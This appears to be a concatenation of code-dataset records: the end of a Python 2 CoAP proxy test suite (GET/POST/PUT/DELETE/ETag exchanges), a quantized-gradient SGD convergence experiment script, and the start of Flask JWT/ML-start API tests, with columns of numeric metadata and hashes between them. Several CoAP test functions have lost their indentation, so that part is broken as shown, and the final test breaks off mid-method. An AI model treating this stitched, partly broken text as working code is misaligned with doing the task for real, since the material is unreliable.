                self.assertEqual(received_message.etag, expected.etag)
            if expected.type is not None:
                self.assertEqual(received_message.type, expected.type)
            if expected.mid is not None:
                self.assertEqual(received_message.mid, expected.mid)
            self.assertEqual(received_message.code, expected.code)
            if expected.source is not None:
                # NOTE(review): compares against self.server_address rather than
                # expected.source — confirm this is intended (expected.source is
                # never set by the current tests, so this branch never runs).
                self.assertEqual(received_message.source, self.server_address)
            if expected.token is not None:
                self.assertEqual(received_message.token, expected.token)
            if expected.payload is not None:
                self.assertEqual(received_message.payload, expected.payload)
            if expected.max_age is not None:
                # Convention: 60 is the CoAP default Max-Age. Setting any other
                # value on `expected` means "must differ from the default",
                # i.e. the response was served from the proxy cache.
                if expected.max_age != 60:
                    self.assertNotEqual(received_message.max_age, 60)
                else:
                    self.assertEqual(received_message.max_age, expected.max_age)
            if expected.options:
                self.assertEqual(len(received_message.options), len(expected.options))
                for o in expected.options:
                    assert isinstance(o, Option)
                    # MAX_AGE and ETAG are already checked above with special
                    # rules, so skip them in the generic option comparison.
                    if o.name != defines.OptionRegistry.MAX_AGE.name and o.name != defines.OptionRegistry.ETAG.name:
                        option_value = getattr(expected, o.name.lower().replace("-", "_"))
                        option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
                        self.assertEqual(option_value, option_value_rec)
    client.stop()
def client_callback(self, response):
    """Asynchronous receive callback: hand the response to the test thread
    via the queue created in setUp."""
    print "Callback"
    self.queue.put(response)
def test_get_multiple(self):
print "TEST_GET_MULTIPLE"
path = "/basic"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/basic"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Basic Resource"
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE (MAX AGE MUST BE CHECKED)
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/basic"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Basic Resource"
expected.max_age = 61
exchange2 = (req2, expected)
self._test_with_client_delayed([exchange1, exchange2])
def test_get_post(self):
print "TEST_GET_POST"
path = "/basic"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.POST.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req3.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange1, exchange2, exchange3, exchange4])
def test_get_put(self):
print "TEST_GET_PUT"
path = "/basic"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.PUT.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req3.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CHANGED.number
expected.token = None
expected.payload = None
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange1, exchange2, exchange3, exchange4])
def test_get_delete(self):
print "TEST_GET_DELETE"
path = "/basic"
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
expected.payload = None
exchange0 = (req2, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.DELETE.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.DELETED.number
expected.token = None
expected.payload = None
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange0, exchange1, exchange2, exchange3, exchange4])
def test_get_etag(self):
    """Exercise ETag handling through the proxy.

    Sequence: two GETs observe the initial etag "0" (the second one
    also carries max_age=1), a POST updates the resource and bumps the
    etag to "1", and a final GET sees the new payload and etag.
    """
    print("TEST_GET_ETAG")
    path = "/etag"
    proxy = "coap://127.0.0.1:5684/etag"

    def build_request(code, payload=None):
        # Confirmable request routed via the forward proxy.
        r = Request()
        r.code = code
        r.uri_path = path
        r.type = defines.Types["CON"]
        r._mid = self.current_mid
        r.destination = self.server_address
        r.proxy_uri = proxy
        if payload is not None:
            r.payload = payload
        return r

    def build_expected(code, **fields):
        # ACK we expect back, matched on the current message id.
        rsp = Response()
        rsp.type = defines.Types["ACK"]
        rsp._mid = self.current_mid
        rsp.code = code
        rsp.token = None
        for attr, value in fields.items():
            setattr(rsp, attr, value)
        return rsp

    exchanges = []

    # 1) plain GET -> CONTENT with the initial etag "0"
    exchanges.append((
        build_request(defines.Codes.GET.number),
        build_expected(defines.Codes.CONTENT.number,
                       payload=None, etag=str(0)),
    ))
    self.current_mid += 1

    # 2) repeated GET -> same etag, now served with max_age 1
    exchanges.append((
        build_request(defines.Codes.GET.number),
        build_expected(defines.Codes.CONTENT.number,
                       etag=str(0), max_age=1),
    ))
    self.current_mid += 1

    # 3) POST a new payload -> CHANGED, etag bumped to "1"
    exchanges.append((
        build_request(defines.Codes.POST.number, payload="Hello"),
        build_expected(defines.Codes.CHANGED.number,
                       payload=None, etag=str(1), location_path="etag"),
    ))
    self.current_mid += 1

    # 4) final GET -> new payload together with etag "1"
    exchanges.append((
        build_request(defines.Codes.GET.number),
        build_expected(defines.Codes.CONTENT.number,
                       payload="Hello", etag=str(1)),
    ))
    self.current_mid += 1

    self._test_with_client_delayed(exchanges)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 34.232794
| 121
| 0.591095
| 1,902
| 16,911
| 5.1204
| 0.077287
| 0.06438
| 0.081939
| 0.066331
| 0.789609
| 0.770613
| 0.767841
| 0.732724
| 0.7318
| 0.731389
| 0
| 0.036438
| 0.308675
| 16,911
| 493
| 122
| 34.302231
| 0.796596
| 0.029153
| 0
| 0.742931
| 0
| 0
| 0.060088
| 0.036895
| 0
| 0
| 0
| 0
| 0.030848
| 0
| null | null | 0
| 0.03599
| null | null | 0.015424
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16e6f0852485d7991ebce87b5ffa12b326c358bc
| 12,427
|
py
|
Python
|
SimpleMSE/tf/convergence_region.py
|
afshinabdi/DistributedTraining-QCS
|
46197b23dc8d8002adcfebbae8653aae6fb77754
|
[
"MIT"
] | null | null | null |
SimpleMSE/tf/convergence_region.py
|
afshinabdi/DistributedTraining-QCS
|
46197b23dc8d8002adcfebbae8653aae6fb77754
|
[
"MIT"
] | 1
|
2020-11-26T11:36:58.000Z
|
2020-11-27T18:42:57.000Z
|
SimpleMSE/tf/convergence_region.py
|
afshinabdi/DistributedTraining-QCS
|
46197b23dc8d8002adcfebbae8653aae6fb77754
|
[
"MIT"
] | null | null | null |
import os
import time
import numpy as np
import scipy.io as sio
import regression_model as rm
from hadamard import load_hadamard_matrix

# Silence TensorFlow INFO/WARNING logs; must be set before TF initializes.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# os.environ['CUDA_VISIBLE_DEVICES'] = '2'

# Destination folder for the .mat result files written by each experiment.
output_folder = 'QuantizedCS/SimpleMSE/tf(64,50)'
np.set_printoptions(precision=3, linewidth=80)

# Hyper-parameters shared by all evaluate_* runners below.
batch_size = 32        # SGD mini-batch size
repeat_num = 10        # independent repetitions per learning rate
num_iterations = 500   # SGD iterations per repetition
num_lr = 25            # number of learning rates on the sweep grid
# Evenly spaced learning rates in (0, 0.25]; the 0 endpoint is dropped.
learning_rates = np.linspace(0, 0.25, num_lr + 1)[1:]
# learning_rates = [0.02, 0.05, 0.06, 0.08, 0.1, 0.15]
# num_lr = len(learning_rates)
def evaluate_baseline(T, Wopt, file_name):
    """Train the regression model with exact (unquantized) gradients.

    Sweeps every value in ``learning_rates``; for each one runs
    ``repeat_num`` independent trainings of ``num_iterations`` SGD
    steps and records the loss trajectory.  Results are saved to
    *file_name* as a MATLAB .mat file with keys 'loss', 'loss2'
    (squared losses, for variance estimates) and 'lr'.
    """
    model = rm.RegressionModel()
    model.create(T, Wopt, quantizer='')  # '' -> no gradient quantization
    # loss[n, rp, cnt]: loss at iteration cnt of repetition rp for lr n.
    loss = np.zeros((num_lr, repeat_num, num_iterations))
    loss2 = np.zeros((num_lr, repeat_num, num_iterations))
    for n, lr in enumerate(learning_rates):
        start = time.time()
        print('\nLearning rate = ', lr, flush=True)
        for rp in range(repeat_num):
            # create model
            model.reset()
            info_str = ' '
            for cnt in range(num_iterations):
                # no quantization of the gradients
                g = model.compute_gradients(batch_size)
                model.apply_gradients(g, learning_rate=lr)
                cur_loss = model.loss(batch_size=1024)
                loss[n, rp, cnt] += cur_loss
                loss2[n, rp, cnt] += (cur_loss**2)
                if cnt % 10 == 0:
                    # wipe the previous in-place progress line
                    print(' ' * len(info_str), end='\r', flush=True)
                # abort this repetition once training has diverged
                if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
                    print(' Diverged.', end='\r', flush=True)
                    break
                info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
                print(info_str, end='\r', flush=True)
            print('')
        elapsed = time.time() - start
        print(' elapsed time = %.3f' % elapsed, flush=True)
    sio.savemat(file_name, mdict={
        'loss': loss,
        'loss2': loss2,
        'lr': learning_rates,
    })
def evaluate_onebit(T, Wopt, file_name):
    """Train with one-bit quantized gradients.

    Same sweep as ``evaluate_baseline`` (learning rates x repetitions
    x iterations); writes 'loss', 'loss2' and 'lr' to *file_name*.
    """
    model = rm.RegressionModel()
    model.create(T, Wopt, quantizer='one-bit')
    loss = np.zeros((num_lr, repeat_num, num_iterations))
    loss2 = np.zeros((num_lr, repeat_num, num_iterations))
    for n, lr in enumerate(learning_rates):
        start = time.time()
        print('\nLearning rate = ', lr, flush=True)
        for rp in range(repeat_num):
            # create model
            model.reset()
            info_str = ' '
            for cnt in range(num_iterations):
                # apply one-bit quantization method to the gradients
                gh = model.compute_quantized_gradients(batch_size)
                model.apply_gradients([gh], learning_rate=lr)
                cur_loss = model.loss(batch_size=1024)
                loss[n, rp, cnt] += cur_loss
                loss2[n, rp, cnt] += (cur_loss**2)
                if cnt % 10 == 0:
                    # wipe the previous in-place progress line
                    print(' ' * len(info_str), end='\r', flush=True)
                # abort this repetition once training has diverged
                if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
                    print(' Diverged.', end='\r', flush=True)
                    break
                info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
                print(info_str, end='\r', flush=True)
            print('')
        elapsed = time.time() - start
        print(' elapsed time = %.3f' % elapsed, flush=True)
    sio.savemat(file_name, mdict={
        'loss': loss,
        'loss2': loss2,
        'lr': learning_rates,
    })
def evaluate_qsgd(T, Wopt, file_name, bucket_size):
    """Train with QSGD-quantized gradients (1 level, given bucket size).

    Same sweep as ``evaluate_baseline``; writes 'loss', 'loss2' and
    'lr' to *file_name*.
    """
    # create model
    model = rm.RegressionModel()
    model.create(T, Wopt, quantizer='qsg', num_levels=1, bucket_size=bucket_size)
    loss = np.zeros((num_lr, repeat_num, num_iterations))
    loss2 = np.zeros((num_lr, repeat_num, num_iterations))
    for n, lr in enumerate(learning_rates):
        start = time.time()
        print('\nLearning rate = ', lr, flush=True)
        for rp in range(repeat_num):
            model.reset()
            info_str = ' '
            for cnt in range(num_iterations):
                # apply qsgd quantization method to the gradients
                gh = model.compute_quantized_gradients(batch_size)
                model.apply_gradients([gh], learning_rate=lr)
                cur_loss = model.loss(batch_size=1024)
                loss[n, rp, cnt] += cur_loss
                loss2[n, rp, cnt] += (cur_loss**2)
                if cnt % 10 == 0:
                    # wipe the previous in-place progress line
                    print(' ' * len(info_str), end='\r', flush=True)
                # abort this repetition once training has diverged
                if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
                    print('Diverged.', end='\r', flush=True)
                    break
                info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
                print(info_str, end='\r', flush=True)
            print('')
        elapsed = time.time() - start
        print(' elapsed time = %.3f' % elapsed, flush=True)
    sio.savemat(file_name, mdict={
        'loss': loss,
        'loss2': loss2,
        'lr': learning_rates,
    })
def evaluate_topksgd(T, Wopt, file_name, K):
    """Train with top-K sparsified gradients (keep the K largest entries).

    Same sweep as ``evaluate_baseline``; writes 'loss', 'loss2' and
    'lr' to *file_name*.
    """
    model = rm.RegressionModel()
    model.create(T, Wopt, quantizer='topk', K=K)
    loss = np.zeros((num_lr, repeat_num, num_iterations))
    loss2 = np.zeros((num_lr, repeat_num, num_iterations))
    for n, lr in enumerate(learning_rates):
        start = time.time()
        print('\nLearning rate = ', lr, flush=True)
        for rp in range(repeat_num):
            # create model
            model.reset()
            info_str = ' '
            for cnt in range(num_iterations):
                # apply top-k sparsification to the gradients
                gh = model.compute_quantized_gradients(batch_size)
                model.apply_gradients([gh], learning_rate=lr)
                cur_loss = model.loss(batch_size=1024)
                loss[n, rp, cnt] += cur_loss
                loss2[n, rp, cnt] += (cur_loss**2)
                if cnt % 10 == 0:
                    # wipe the previous in-place progress line
                    print(' ' * len(info_str), end='\r', flush=True)
                # abort this repetition once training has diverged
                if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
                    print('Diverged.', end='\r', flush=True)
                    break
                info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
                print(info_str, end='\r', flush=True)
            print('')
        elapsed = time.time() - start
        print(' elapsed time = %.3f' % elapsed, flush=True)
    sio.savemat(file_name, mdict={
        'loss': loss,
        'loss2': loss2,
        'lr': learning_rates,
    })
def evaluate_dtqsgd(T, Wopt, file_name, H):
    """Train with dithered transformed quantization ('dtq', matrix H).

    Same sweep as ``evaluate_baseline``; writes 'loss', 'loss2' and
    'lr' to *file_name*.
    """
    model = rm.RegressionModel()
    model.create(T, Wopt, quantizer='dtq', num_levels=1, H=H)
    loss = np.zeros((num_lr, repeat_num, num_iterations))
    loss2 = np.zeros((num_lr, repeat_num, num_iterations))
    for n, lr in enumerate(learning_rates):
        start = time.time()
        print('\nLearning rate = ', lr, flush=True)
        for rp in range(repeat_num):
            model.reset()
            info_str = ' '
            for cnt in range(num_iterations):
                # apply dithered transformed quantization to the gradients
                gh = model.compute_quantized_gradients(batch_size)
                model.apply_gradients([gh], learning_rate=lr)
                cur_loss = model.loss(batch_size=1024)
                loss[n, rp, cnt] += cur_loss
                loss2[n, rp, cnt] += (cur_loss**2)
                if cnt % 10 == 0:
                    # wipe the previous in-place progress line
                    print(' ' * len(info_str), end='\r', flush=True)
                # abort this repetition once training has diverged
                if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
                    print('Diverged.', end='\r', flush=True)
                    break
                info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
                print(info_str, end='\r', flush=True)
            print('')
        elapsed = time.time() - start
        print(' elapsed time = %.3f' % elapsed, flush=True)
    sio.savemat(file_name, mdict={
        'loss': loss,
        'loss2': loss2,
        'lr': learning_rates,
    })
def evaluate_qcssgd(T, Wopt, file_name, H, feedback, beta):
    """Train with quantized compressed-sensing ('qcs') gradients.

    *H* is the (possibly partial) Hadamard measurement matrix;
    *feedback*/*beta* control the error-feedback loop.  Same sweep as
    ``evaluate_baseline``; writes 'loss', 'loss2' and 'lr' to
    *file_name*.
    """
    model = rm.RegressionModel()
    model.create(T, Wopt, quantizer='qcs', num_levels=1, H=H, feedback=feedback, beta=beta)
    loss = np.zeros((num_lr, repeat_num, num_iterations))
    loss2 = np.zeros((num_lr, repeat_num, num_iterations))
    for n, lr in enumerate(learning_rates):
        start = time.time()
        print('\nLearning rate = ', lr, flush=True)
        for rp in range(repeat_num):
            model.reset()
            info_str = ' '
            for cnt in range(num_iterations):
                # apply quantized compressed sensing to the gradients
                gh = model.compute_quantized_gradients(batch_size)
                model.apply_gradients([gh], learning_rate=lr)
                cur_loss = model.loss(batch_size=1024)
                loss[n, rp, cnt] += cur_loss
                loss2[n, rp, cnt] += (cur_loss**2)
                if cnt % 10 == 0:
                    # wipe the previous in-place progress line
                    print(' ' * len(info_str), end='\r', flush=True)
                # abort this repetition once training has diverged
                if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
                    print('Diverged.', end='\r', flush=True)
                    break
                info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
                print(info_str, end='\r', flush=True)
            print('')
        elapsed = time.time() - start
        print(' elapsed time = %.3f' % elapsed, flush=True)
    sio.savemat(file_name, mdict={
        'loss': loss,
        'loss2': loss2,
        'lr': learning_rates,
    })
def compare_algorithms():
    """Run the (currently enabled) gradient-compression experiments.

    Loads — or creates and caches — a shared problem instance
    (transformation T, its factor R, and optimum Wopt) so every
    algorithm is compared on the same model, then runs the selected
    evaluations.  Only the no-feedback, full-H QCS experiment is
    active; the other runs are kept as commented-out history.
    """
    M, N = 50, 64          # model dimensions
    bucket_size = 320      # quantization bucket length
    min_eig = 1            # NOTE(review): presumably eigenvalue bounds for T
    max_eig = 4            #   passed to rm.create_transformation — confirm there
    H = load_hadamard_matrix(n=bucket_size)
    # Partial Hadamard: keep the last k columns, rescaled so the
    # measurement energy matches the full matrix.
    k = bucket_size * 3 // 4
    Hk = H[:, -k:] * np.sqrt(bucket_size) / np.sqrt(k)
    # Top-k budget: number of entries matching a log2(3)-bit/entry rate.
    K = int(M * N * np.log2(3) / 32)
    fname = os.path.join(output_folder, 'model.mat')
    if os.path.exists(fname):
        # Reuse the previously generated problem instance.
        data = sio.loadmat(fname)
        Wopt = data['Wo']
        T = data['T']
        R = data['R']
    else:
        # First run: create the problem and cache it for later runs.
        T, R = rm.create_transformation(M, min_eig, max_eig)
        Wopt = np.random.normal(0, 1, size=(M, N))
        sio.savemat(fname, mdict={'Wo': Wopt, 'T': T, 'R': R})
    # print('_' * 40)
    # print('Evaluating baseline...')
    # fname = os.path.join(output_folder, 'baseline.mat')
    # evaluate_baseline(T, Wopt, file_name=fname)
    # print('_' * 40)
    # print('Evaluating QSGD...')
    # fname = os.path.join(output_folder, 'qsgd.mat')
    # evaluate_qsgd(T, Wopt, file_name=fname, bucket_size=bucket_size)
    # print('_' * 40)
    # print('Evaluating Top-k SGD...')
    # fname = os.path.join(output_folder, 'topk{}-sgd.mat'.format(K))
    # evaluate_topksgd(T, Wopt, file_name=fname, K=K)
    print('_' * 40)
    print('Evaluating Quantized CS SGD without feedback, all H...')
    fname = os.path.join(output_folder, 'qcssgd_nfa.mat')
    evaluate_qcssgd(T, Wopt, file_name=fname, H=H, feedback=False, beta=0)
    # print('_' * 40)
    # print('Evaluating Quantized CS SGD with feedback, all H...')
    # fname = os.path.join(output_folder, 'qcssgd_wfa.mat')
    # evaluate_qcssgd(T, Wopt, file_name=fname, H=H, feedback=True, beta=0.5)
    # print('_' * 40)
    # print('Evaluating Quantized CS SGD without feedback, partial H...')
    # fname = os.path.join(output_folder, 'qcssgd_nf{}.mat'.format(k))
    # evaluate_qcssgd(T, Wopt, file_name=fname, H=Hk, feedback=False, beta=0)
    # print('_' * 40)
    # print('Evaluating Quantized CS SGD with feedback, partial H...')
    # fname = os.path.join(output_folder, 'qcssgd_wf{}.mat'.format(k))
    # evaluate_qcssgd(T, Wopt, file_name=fname, H=Hk, feedback=True, beta=0.2)
    # print('_' * 40)
    # print('Evaluating Dithered Quantized Transformed SGD...')
    # fname = os.path.join(output_folder, 'dtqsgd.mat')
    # evaluate_dtqsgd(T, Wopt, file_name=fname, H=H)
    # import seaborns as sns
    # ax = sns.tsplot(time="timepoint", value="BOLD signal",
    # unit="subject", condition="ROI",
    # data=...)
# Script entry point: run the experiment sweep when executed directly.
if __name__ == '__main__':
    compare_algorithms()
| 35.10452
| 106
| 0.550978
| 1,586
| 12,427
| 4.153846
| 0.120429
| 0.038251
| 0.021858
| 0.032787
| 0.82119
| 0.814967
| 0.76867
| 0.756527
| 0.72799
| 0.714936
| 0
| 0.025
| 0.307958
| 12,427
| 353
| 107
| 35.203966
| 0.741047
| 0.151364
| 0
| 0.770563
| 0
| 0
| 0.080571
| 0.002952
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.025974
| 0
| 0.056277
| 0.168831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc7af6f3c6d2b7ed6498a3f3da679c6da443b456
| 24,863
|
py
|
Python
|
services/machine_learning/project/tests/test_ml_api.py
|
geraldomacias/MarkLogic
|
996c48a970a24aa7e5af4752fe9c12b63d4834fe
|
[
"BSD-2-Clause"
] | 5
|
2018-12-03T18:08:34.000Z
|
2019-03-13T05:59:07.000Z
|
services/machine_learning/project/tests/test_ml_api.py
|
geraldomacias/MarkLogic
|
996c48a970a24aa7e5af4752fe9c12b63d4834fe
|
[
"BSD-2-Clause"
] | 7
|
2018-12-03T23:11:14.000Z
|
2019-06-06T06:00:39.000Z
|
services/machine_learning/project/tests/test_ml_api.py
|
geraldomacias/MarkLogic
|
996c48a970a24aa7e5af4752fe9c12b63d4834fe
|
[
"BSD-2-Clause"
] | 1
|
2019-04-11T16:34:55.000Z
|
2019-04-11T16:34:55.000Z
|
"""
Copyright 2019 Team Mark
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# services/machine_learning/project/tests/test_ml_api.py
import json
import unittest
import time
import datetime
import jwt
from project import db
from project.api.models import BlacklistToken, MLStatus, decode_auth_token
from project.tests.base import BaseTestCase
from flask import current_app
def encode_auth_token(user_id):
    """Build a short-lived (5 second) HS256 JWT for *user_id*.

    Test-only helper mirroring the application's token format.  On
    failure the exception object itself is returned instead of being
    raised — preserved from the original implementation, since the
    tests only exercise the success path.
    """
    try:
        claims = {
            'exp': datetime.datetime.utcnow() + datetime.timedelta(days=0, seconds=5),
            'iat': datetime.datetime.utcnow(),
            'sub': user_id,
        }
        secret = current_app.config.get('SECRET_KEY')
        return jwt.encode(claims, secret, algorithm='HS256')
    except Exception as err:
        # NOTE(review): returning the exception rather than raising is
        # intentional legacy behavior of this helper.
        return err
class TestJWT(BaseTestCase):
    """Round-trip tests for JWT encoding and decoding."""

    def test_encode_auth_token(self):
        """Ensure auth tokens are encoded correctly."""
        token = encode_auth_token(1)
        self.assertTrue(isinstance(token, bytes))

    def test_decode_auth_token(self):
        """Ensure auth tokens are decoded correctly."""
        token = encode_auth_token(1)
        self.assertTrue(isinstance(token, bytes))
        # Decoding must recover the original user id.
        self.assertTrue(decode_auth_token(token.decode("utf-8")) == 1)
class TestStartML(BaseTestCase):
    """Tests to ensure starting the ML component works.

    Each case POSTs to /ml/start with a different authentication or
    payload defect and checks the JSON envelope ('status'/'message')
    plus the HTTP status code.
    """

    def test_startml_no_auth(self):
        """Test for starting ml with no provided token"""
        with self.client:
            response = self.client.post(
                '/ml/start'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Provide a valid auth token.')
            self.assertEqual(response.status_code, 401)

    def test_startml_malformed_bearer(self):
        """Test for starting ml with malformed bearer token."""
        with self.client:
            auth_token = encode_auth_token(1)
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    # deliberately no space after 'Bearer' -> malformed header
                    Authorization='Bearer' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Bearer token malformed.')
            self.assertEqual(response.status_code, 401)

    def test_startml_blacklisted_token(self):
        """Test for starting ml with a blacklisted token."""
        with self.client:
            auth_token = encode_auth_token(1)
            # Blacklist a valid token
            blacklist_token = BlacklistToken(auth_token.decode())
            db.session.add(blacklist_token)
            db.session.commit()
            # blacklisted token request
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
